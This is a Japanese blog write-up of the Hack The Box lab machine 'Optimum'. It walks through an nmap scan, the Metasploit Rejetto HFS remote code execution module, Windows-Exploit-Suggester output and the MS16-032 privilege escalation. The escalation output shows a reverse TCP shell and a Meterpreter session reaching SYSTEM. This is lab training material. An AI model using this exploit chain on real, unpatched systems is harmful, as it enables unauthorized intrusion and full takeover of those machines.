shinobi CTF

HTBとCTF頑張る

Hack The Box Optimum

Conclusion

Procedure

  1. nmap

     PORT   STATE SERVICE VERSION
     80/tcp open  http    HttpFileServer httpd 2.3
     |_http-server-header: HFS 2.3
     |_http-title: HFS /
    
  2. 80/tcpにブラウザでアクセスする

    nmapの情報通りHttpFileServer 2.3が動いている。

  3. exploit dbにexploitの情報がある。metasploit moduleもあるのでそちらを使う

     msf6 > search HttpFileServer 2.3
    
     Matching Modules
     ================
    
        #  Name                                   Disclosure Date  Rank       Check  Description
        -  ----                                   ---------------  ----       -----  -----------
        0  exploit/windows/http/rejetto_hfs_exec  2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution
    
  4. metapriter shellゲット

     > meterpreter > getuid 
     Server username: OPTIMUM\kostas
    
  5. systeminfoを取得

     C:\Users\kostas\Desktop>systeminfo
     Host Name:                 OPTIMUM
     OS Name:                   Microsoft Windows Server 2012 R2 Standard
     OS Version:                6.3.9600 N/A Build 9600
     OS Manufacturer:           Microsoft Corporation
     OS Configuration:          Standalone Server
     OS Build Type:             Multiprocessor Free
     Registered Owner:          Windows User
    
  6. Windows server 2012とOSが古いので、Windows-Exploit-Suggesterを使用する。

     $  python --version
     Python 2.7.18
     $ pip list | grep xlrd
     DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. A future version of pip will drop support for Python 2.7. More details about Python 2 support in pip, can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support
     xlrd          1.2.0     
     $ python windows-exploit-suggester.py -i systeminfo.txt -d 2021-02-13-mssb.xls
     [*] initiating winsploit version 3.3...
     [*] database file detected as xls or xlsx based on extension
     [*] attempting to read from the systeminfo input file
     [+] systeminfo input file read successfully (utf-8)
     [*] querying database file for potential vulnerabilities
     [*] comparing the 32 hotfix(es) against the 266 potential bulletins(s) with a database of 137 known exploits
     [*] there are now 246 remaining vulns
     [+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
     [+] windows version identified as 'Windows 2012 R2 64-bit'
     [*] 
     [E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
     [*]   https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
     [*]   https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
     [*]   https://github.com/tinysec/public/tree/master/CVE-2016-7255
     [*] 
     [E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
     [*]   https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)
     [*] 
     [M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
     [*]   https://github.com/foxglovesec/RottenPotato
     [*]   https://github.com/Kevin-Robertson/Tater
     [*]   https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege
     [*]   https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation
     [*] 
     [E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important
     [*]   https://www.exploit-db.com/exploits/39990/ -- Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-074), PoC
     [*]   https://www.exploit-db.com/exploits/39991/ -- Windows Kernel - ATMFD.DLL NamedEscape 0x250C Pool Corruption (MS16-074), PoC
     [*] 
     [E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical
     [*]   https://www.exploit-db.com/exploits/39994/ -- Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063), PoC
     [*] 
     [E] MS16-032: Security Update for Secondary Logon to Address Elevation of Privile (3143141) - Important
     [*]   https://www.exploit-db.com/exploits/40107/ -- MS16-032 Secondary Logon Handle Privilege Escalation, MSF
     [*]   https://www.exploit-db.com/exploits/39574/ -- Microsoft Windows 8.1/10 - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032), PoC
     [*]   https://www.exploit-db.com/exploits/39719/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell), PoC
     [*]   https://www.exploit-db.com/exploits/39809/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (C#)
     [*] 
     [M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) - Important
     [*]   https://www.exploit-db.com/exploits/40085/ -- MS16-016 mrxdav.sys WebDav Local Privilege Escalation, MSF
     [*]   https://www.exploit-db.com/exploits/39788/ -- Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2), PoC
     [*]   https://www.exploit-db.com/exploits/39432/ -- Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1), PoC
     [*] 
     [E] MS16-014: Security Update for Microsoft Windows to Address Remote Code Execution (3134228) - Important
     [*]   Windows 7 SP1 x86 - Privilege Escalation (MS16-014), https://www.exploit-db.com/exploits/40039/, PoC
     [*] 
     [E] MS16-007: Security Update for Microsoft Windows to Address Remote Code Execution (3124901) - Important
     [*]   https://www.exploit-db.com/exploits/39232/ -- Microsoft Windows devenum.dll!DeviceMoniker::Load() - Heap Corruption Buffer Underflow (MS16-007), PoC
     [*]   https://www.exploit-db.com/exploits/39233/ -- Microsoft Office / COM Object DLL Planting with WMALFXGFXDSP.dll (MS-16-007), PoC
     [*] 
     [E] MS15-132: Security Update for Microsoft Windows to Address Remote Code Execution (3116162) - Important
     [*]   https://www.exploit-db.com/exploits/38968/ -- Microsoft Office / COM Object DLL Planting with comsvcs.dll Delay Load of mqrt.dll (MS15-132), PoC
     [*]   https://www.exploit-db.com/exploits/38918/ -- Microsoft Office / COM Object els.dll DLL Planting (MS15-134), PoC
     [*] 
     [E] MS15-112: Cumulative Security Update for Internet Explorer (3104517) - Critical
     [*]   https://www.exploit-db.com/exploits/39698/ -- Internet Explorer 9/10/11 - CDOMStringDataList::InitFromString Out-of-Bounds Read (MS15-112)
     [*] 
     [E] MS15-111: Security Update for Windows Kernel to Address Elevation of Privilege (3096447) - Important
     [*]   https://www.exploit-db.com/exploits/38474/ -- Windows 10 Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111), PoC
     [*] 
     [E] MS15-102: Vulnerabilities in Windows Task Management Could Allow Elevation of Privilege (3089657) - Important
     [*]   https://www.exploit-db.com/exploits/38202/ -- Windows CreateObjectTask SettingsSyncDiagnostics Privilege Escalation, PoC
     [*]   https://www.exploit-db.com/exploits/38200/ -- Windows Task Scheduler DeleteExpiredTaskAfter File Deletion Privilege Escalation, PoC
     [*]   https://www.exploit-db.com/exploits/38201/ -- Windows CreateObjectTask TileUserBroker Privilege Escalation, PoC
     [*] 
     [E] MS15-097: Vulnerabilities in Microsoft Graphics Component Could Allow Remote Code Execution (3089656) - Critical
     [*]   https://www.exploit-db.com/exploits/38198/ -- Windows 10 Build 10130 - User Mode Font Driver Thread Permissions Privilege Escalation, PoC
     [*]   https://www.exploit-db.com/exploits/38199/ -- Windows NtUserGetClipboardAccessToken Token Leak, PoC
     [*] 
     [M] MS15-078: Vulnerability in Microsoft Font Driver Could Allow Remote Code Execution (3079904) - Critical
     [*]   https://www.exploit-db.com/exploits/38222/ -- MS15-078 Microsoft Windows Font Driver Buffer Overflow
     [*] 
     [E] MS15-052: Vulnerability in Windows Kernel Could Allow Security Feature Bypass (3050514) - Important
     [*]   https://www.exploit-db.com/exploits/37052/ -- Windows - CNG.SYS Kernel Security Feature Bypass PoC (MS15-052), PoC
     [*] 
     [M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
     [*]   https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC
     [*]   https://www.exploit-db.com/exploits/37367/ -- Windows ClientCopyImage Win32k Exploit, MSF
     [*] 
     [E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical
     [*]   https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows 8.1 - win32k Local Privilege Escalation (MS15-010), PoC
     [*]   https://www.exploit-db.com/exploits/37098/ -- Microsoft Windows - Local Privilege Escalation (MS15-010), PoC
     [*]   https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows win32k Local Privilege Escalation (MS15-010), PoC
     [*] 
     [E] MS15-001: Vulnerability in Windows Application Compatibility Cache Could Allow Elevation of Privilege (3023266) - Important
     [*]   http://www.exploit-db.com/exploits/35661/ -- Windows 8.1 (32/64 bit) - Privilege Escalation (ahcache.sys/NtApphelpCacheControl), PoC
     [*] 
     [E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical
     [*]   http://www.exploit-db.com/exploits/35474/ -- Windows Kerberos - Elevation of Privilege (MS14-068), PoC
     [*] 
     [M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
     [*]   https://www.exploit-db.com/exploits/37800// -- Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064), PoC
     [*]   http://www.exploit-db.com/exploits/35308/ -- Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064), PoC
     [*]   http://www.exploit-db.com/exploits/35229/ -- Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1), PoC
     [*]   http://www.exploit-db.com/exploits/35230/ -- Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF), MSF
     [*]   http://www.exploit-db.com/exploits/35235/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python, MSF
     [*]   http://www.exploit-db.com/exploits/35236/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution, MSF
     [*] 
     [M] MS14-060: Vulnerability in Windows OLE Could Allow Remote Code Execution (3000869) - Important
     [*]   http://www.exploit-db.com/exploits/35055/ -- Windows OLE - Remote Code Execution 'Sandworm' Exploit (MS14-060), PoC
     [*]   http://www.exploit-db.com/exploits/35020/ -- MS14-060 Microsoft Windows OLE Package Manager Code Execution, MSF
     [*] 
     [M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical
     [*]   http://www.exploit-db.com/exploits/35101/ -- Windows TrackPopupMenu Win32k NULL Pointer Dereference, MSF
     [*] 
     [E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
     [M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
     [*] done
    
  7. windows server 2012に関する権限昇格の脆弱性を使用する。

     [E] MS16-032: Security Update for Secondary Logon to Address Elevation of Privile (3143141) - Important
     [*]   https://www.exploit-db.com/exploits/40107/ -- MS16-032 Secondary Logon Handle Privilege Escalation, MSF
     [*]   https://www.exploit-db.com/exploits/39574/ -- Microsoft Windows 8.1/10 - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032), PoC
     [*]   https://www.exploit-db.com/exploits/39719/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell), PoC
     [*]   https://www.exploit-db.com/exploits/39809/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (C#)
    

    metasploitで検索

     msf6 exploit(windows/http/rejetto_hfs_exec) > search ms16-032
    
     Matching Modules
     ================
    
        #  Name                                                           Disclosure Date  Rank    Check  Description
        -  ----                                                           ---------------  ----    -----  -----------
        0  exploit/windows/local/ms16_032_secondary_logon_handle_privesc  2016-03-21       normal  Yes    MS16-032 Secondary Logon Handle Privilege Escalation
    
  8. exploit実行

     msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run
    
     [*] Started reverse TCP handler on 10.10.15.3:4444 
     [+] Compressed size: 1016
     [!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
     [*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\PJkXiFJ.ps1...
     [*] Compressing script contents...
     [+] Compressed size: 3596
     [*] Executing exploit script...
         __ __ ___ ___   ___     ___ ___ ___ 
         |  V  |  _|_  | |  _|___|   |_  |_  |
         |     |_  |_| |_| . |___| | |_  |  _|
         |_|_|_|___|_____|___|   |___|___|___|
    
                     [by b33f -> @FuzzySec]
    
     [?] Operating system core count: 2
     [>] Duplicating CreateProcessWithLogonW handle
     [?] Done, using thread handle: 1668
    
     [*] Sniffing out privileged impersonation token..
    
     [?] Thread belongs to: svchost
     [+] Thread suspended
     [>] Wiping current impersonation token
     [>] Building SYSTEM impersonation token
     [?] Success, open SYSTEM token handle: 1664
     [+] Resuming thread..
    
     [*] Sniffing out SYSTEM shell..
    
     [>] Duplicating SYSTEM token
     [>] Starting token race
     [>] Starting process race
     [!] Holy handle leak Batman, we have a SYSTEM shell!!
    
     Xq5W9PjuLpljAZQdaDRsBXL2hBGuiRkj
     [+] Executed on target machine.
     [*] Sending stage (175174 bytes) to 10.10.10.8
     [*] Meterpreter session 6 opened (10.10.15.3:4444 -> 10.10.10.8:49177) at 2021-02-27 12:17:41 +0900
     [+] Deleted C:\Users\kostas\AppData\Local\Temp\PJkXiFJ.ps1
    
     meterpreter > getuid 
     Server username: NT AUTHORITY\SYSTEM
    

    SYSTEM権限をGET

Closing